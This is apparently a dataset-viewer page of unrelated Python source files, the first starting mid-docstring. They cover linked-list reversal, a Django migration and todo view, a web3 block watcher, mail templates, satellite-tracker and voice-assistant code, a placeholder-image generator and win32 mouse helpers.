    :return: new head node (the old tail), or None
    """
    reversed_prefix = None      # nodes already reversed
    current = head              # node being processed
    while current:              # the tail node's next is None
        remainder = current.next            # remember the rest of the list
        current.next = reversed_prefix      # point back at the reversed part
        reversed_prefix = current           # current joins the reversed prefix
        current = remainder                 # advance
    return reversed_prefix
# Demo: reverse the list built above and print it again.
reverse = reverseLink(head)
print_link(reverse)
|
# Generated by Django 2.2.6 on 2019-10-17 14:53
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add Credential.extractor_url and make Credential.touch default to True."""

    dependencies = [
        ('picker', '0005_auto_20190331_1043'),
    ]
    operations = [
        migrations.AddField(
            model_name='credential',
            name='extractor_url',
            field=models.CharField(blank=True, default='http://localhost:5000/api/subscribe', max_length=200),
        ),
        migrations.AlterField(
            model_name='credential',
            name='touch',
            field=models.BooleanField(default=True),
        ),
    ]
|
from web3 import Web3
from web3.utils.encoding import to_hex
import time
# Connect to a local Ethereum JSON-RPC node.
w3 = Web3(Web3.HTTPProvider('http://localhost:8545'))
# Filter that yields the hash of each newly mined block.
# NOTE(review): the name `filter` shadows the Python builtin.
filter = w3.eth.filter('latest')
# Poll forever: fetch every new block (True = include full transaction
# objects, not just hashes) and dump each transaction's input data.
while True:
    for blk_hash in filter.get_new_entries():
        block = w3.eth.getBlock(blk_hash,True)
        for tx in block.transactions:
            print('tx data => {0}'.format(tx.input))
    time.sleep(2)
|
"""
Reads mail templates into memory and provides functions to format them.
"""
# Templates are read once at import time and cached in module globals.
# Fix: read with an explicit encoding — the previous code used the
# platform-dependent default, which breaks non-ASCII templates on some systems.
with open('mail_templates/verification_html.txt', 'r', encoding='utf-8') as f:
    _verification_mail_html = f.read()
with open('mail_templates/verification_plain.txt', 'r', encoding='utf-8') as f:
    _verification_mail_plain = f.read()
def format_verification_mail_html(username, verification_url, expiration_date):
    """
    Format an HTML verification mail.
    :param username: Username to use in the mail.
    :param verification_url: Verification link to use in the mail.
    :param expiration_date: Expiration date of the verification code.
    :return: The formatted HTML verification mail.
    """
    substitutions = {
        'username': username,
        'verification_url': verification_url,
        'expiration_date': expiration_date,
    }
    return _verification_mail_html.format(**substitutions)
def format_verification_mail_plain(username, verification_url, expiration_date):
    """
    Format a plaintext verification mail.
    :param username: Username to use in the mail.
    :param verification_url: Verification link to use in the mail.
    :param expiration_date: Expiration date of the verification code.
    :return: The formatted plaintext verification mail.
    """
    substitutions = {
        'username': username,
        'verification_url': verification_url,
        'expiration_date': expiration_date,
    }
    return _verification_mail_plain.format(**substitutions)
|
from django.shortcuts import render
from django.http import HttpResponse
from todo.models import Todo
# Create your views here.
def home(request):
    """List all todos; on POST, first create a todo from the submitted form.

    Cleanup: the original had a dead ``else: pass`` branch, removed here
    with no behavior change.
    """
    if request.method == 'POST':
        todo = request.POST['todo'].strip()
        priority = request.POST['priority'].strip()
        Todo.objects.create(todo=todo, priority=priority)
    post_list = Todo.objects.all()
    return render(request, 'home.html', {'post_list' : post_list})
#return HttpResponse("Hello World, Django")
#def detail(request, my_args):
# post = Todo.objects.all()[int(my_args)]
# str_content = ("todo = %s, priority = %s" % (post.todo, post.priority))
# return HttpResponse(str_content)
|
#!/usr/bin/env python
from optparse import OptionParser
from tracker_module import *
from predict import *
from tracker_gui import *
import sys
if __name__ == '__main__':
    #--------START Command Line option parser------------------------------------------------
    usage = "usage: %prog -a <Server Address> -p <Server Port> "
    parser = OptionParser(usage = usage)
    # Help strings for the options declared below.
    pred_ip_h = "IP address of Predict Server, Default: 127.0.0.1"
    pred_port_h = "Port Number of Predict Server, Default: 1210"
    track_ip_h = "IP address of tracker, Default: 192.168.20.3"
    track_port_h = "TCP port number of tracker, Default: 196"
    sat_id_h = "Satellite ID, NORAD ID # or Sat Name"
    interval_h = "Predict Update Interval, default = 1.0 seconds"
    parser.add_option("--predict-ip" , dest = "pred_ip"   , action = "store", type = "string", default = "127.0.0.1", help = pred_ip_h)
    parser.add_option("--predict-port", dest = "pred_port" , action = "store", type = "int"   , default = "1210"        , help = pred_port_h)
    parser.add_option("--tracker-ip" , dest = "track_ip"  , action = "store", type = "string", default = "192.168.20.3", help = track_ip_h)
    parser.add_option("--tracker-port", dest = "track_port", action = "store", type = "int"   , default = "196"        , help = track_port_h)
    parser.add_option("--sat-id"     , dest = "sat_id"    , action = "store", type = "string", default = ""           , help = sat_id_h)
    parser.add_option("--interval"   , dest = "interval"  , action = "store", type = "float" , default = "1.0"        , help = interval_h)
    (options, args) = parser.parse_args()
    #--------END Command Line option parser-------------------------------------------------
    # Earlier thread-based console workflow, kept for reference:
    #pt = Predict_Thread(options)
    #tt = Tracker_Thread(options)
    #dt = Display_Thread(options, tt, pt)
    #pt.daemon = True
    #tt.daemon = True
    #dt.daemon = True
    #pt.start()
    #tt.start()
    #dt.run()
    #sys.exit()
    # Current entry point: launch the Qt GUI and block until it exits.
    # NOTE(review): parsed `options` are not passed to tracker_main_gui() —
    # confirm the GUI reads its own configuration.
    app = QtGui.QApplication(sys.argv)
    ex = tracker_main_gui()
    sys.exit(app.exec_())
    #stop_flag = False
    #while not stop_flag:
    #    os.system("clear")
    #    command = raw_input("Enter WAAA EEE or (q)uit: ")
    #    if command == 'q':
    #        stop_flag = True
    #        print "terminating, please wait..."
    #    else:
    #        tt.Write_Raw_Message(command)
    #dt.run()
    #print "terminating, please wait..."
    #tt.stop()
    #dt.stop()
    #pt.join()
|
from architecture.service_structure import ServiceStructure
from interaction.chatbots.minuteur_chatbot import MinuteurChatBot
from interaction.recognition import RecognitionStates
import base64
import time
import threading
class ConversationStates:
    """String constants describing the outcome of a conversation turn."""

    ANSWER_FOUND = "Answer found"
    ANSWER_NOT_FOUND = "Answer not found"
class Conversation(ServiceStructure):
    """Service that routes recognized speech to a keyword-matched chatbot
    and plays the synthesized answer back to the user."""

    def __init__(self, services_handle):
        super().__init__(services_handle)
        self.name = "Conversation"
        self.configuration_json = None
        self.chatbots_list = []
        self.keyword_list = []
        self.set_configuration()

    def set_configuration(self):
        """Instantiate the available chatbots and cache their trigger keywords."""
        self.chatbots_list = [MinuteurChatBot(self.services, find_number=True)]
        self.keyword_list = [chatbot.keyword for chatbot in self.chatbots_list]

    def switch_conversation_state(self, state):
        """Show *state* on the LEDs for two seconds, then return recognition to idle."""
        print("switch recording state")
        self.services.leds.set_mode(state)
        time.sleep(2)
        self.services.recognition.switch_recognition_state(RecognitionStates.IDLE)

    def switch_conversation_state_thread(self, state):
        """Run switch_conversation_state in a background thread so the
        two-second LED display does not block the caller."""
        threading.Thread(target=lambda: self.switch_conversation_state(state)).start()

    def start_interaction(self):
        """Run one recognition pass; when a chatbot keyword matches, fetch and
        speak its answer, signalling success or failure via the LEDs.

        Cleanup: removed an unused local (``chatbot``) from the keyword loop.
        """
        recognition_dict = self.services.recognition.start_recognition()
        if recognition_dict["success"]:
            result, language, confidence = recognition_dict["results"]
            print(self.keyword_list)
            answer = ""
            for index, keyword in enumerate(self.keyword_list):
                # Keyword must be followed by a space in the recognized text.
                if keyword + " " in result:
                    print("start chatbot with keyword {}".format(keyword))
                    answer = self.chatbots_list[index].get_answer(result, language)
            if answer:
                self.switch_conversation_state_thread(ConversationStates.ANSWER_FOUND)
                print(answer)
                answer_wav = base64.b64decode(self.services.google_handle.text_to_speech_api(answer, language).encode('ascii'))
                self.services.audio_player.play_from_wav_content(answer_wav)
            else:
                self.switch_conversation_state_thread(ConversationStates.ANSWER_NOT_FOUND)
                time.sleep(2)
        else:
            self.switch_conversation_state_thread(ConversationStates.ANSWER_NOT_FOUND)
|
import requests
from base64 import b64encode
from color import Color
import string
import random
# Number of placeholder images to generate per image type.
images = 10
# Square image edge length in pixels.
size = 64
# Image formats requested from the generator service.
types = ['jpeg', 'png', 'gif']
# Output file that receives the generated JavaScript.
file_path = "../js/photos.js"
# Alphabet used for random image ids.
chars = string.ascii_letters + string.digits
def gen_id(length = 2, chars = chars):
    """Return a random identifier of *length* characters drawn from *chars*."""
    picks = [random.choice(chars) for _ in range(length)]
    return ''.join(picks)
def gen_params(images):
    """Generate one {'color', 'contrast', 'id'} dict per requested image."""
    c = Color()
    params = []
    for _ in range(images):
        params.append({
            'color': c.rnd_color(),
            'contrast': c.contrast(),
            'id': gen_id(),
        })
    return params
def get_image(size, back_color, text_color, type, text):
    """Fetch a generated placeholder image from dummyimage.com.

    Returns the raw response body on HTTP 200, otherwise "".
    (Python 2 file: note the print statement below.)
    """
    url = "http://dummyimage.com/%d/%s/%s.%s&text=%s" % (size, back_color, text_color, type, text)
    print url
    r = requests.get(url)
    return r.content if r.status_code == 200 else ""
def gen_js_file(images, size, types, file_path):
    """Write a JS file defining ``photos``: a map from image type to a list
    of base64-encoded placeholder images fetched from dummyimage.com."""
    with open(file_path, 'w') as f:
        params = gen_params(images)
        f.write("var photos = {\n")
        for i, type in enumerate(types):
            f.write("\t%s: [" % type)
            for j in range(0, images):
                temp = get_image(size, params[j]['color'], params[j]['contrast'], type, params[j]['id'])
                # The conditional expressions below only exist to omit the
                # trailing comma after the last image / last type.
                f.write("\n\t\t\"%s\", " % b64encode(temp)) if j < (images - 1) else f.write("\n\t\t\"%s\"" % b64encode(temp))
            f.write("\n\t],\n") if i < (len(types) - 1) else f.write("\n\t]\n")
        f.write("};")
if __name__ == "__main__":
gen_js_file(images, size, types, file_path)
|
from win32api import GetKeyState, mouse_event
from win32con import MOUSEEVENTF_WHEEL
def key_down(key):
    """Return 1 if *key* is currently pressed, else 0.

    GetKeyState values 0 and 1 mean the key is up (only the toggle bit may
    be set); any other value means the pressed bit is set.
    """
    return 0 if GetKeyState(key) in (0, 1) else 1
def scroll_wheel_forward(x,y):
    """Issue a mouse-wheel event at (x, y); return 1 on "success", else 0.

    NOTE(review): pywin32's mouse_event wrapper normally returns None, so the
    ``> 0`` comparison looks suspect (it raises TypeError on Python 3) —
    verify against the pywin32 version in use.
    """
    if mouse_event(MOUSEEVENTF_WHEEL,x,y) > 0:
        return 1
    else:
        return 0
def scroll_wheel_backward(x,y):
    """Issue a mouse-wheel event at (x, y); return 1 if "negative", else 0.

    NOTE(review): as with scroll_wheel_forward, mouse_event normally returns
    None, so the ``< 0`` comparison looks suspect — verify. Also note no
    negative wheel delta is passed, so this likely does not scroll backward.
    """
    if mouse_event(MOUSEEVENTF_WHEEL,x,y) < 0:
        return 1
    else:
        return 0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.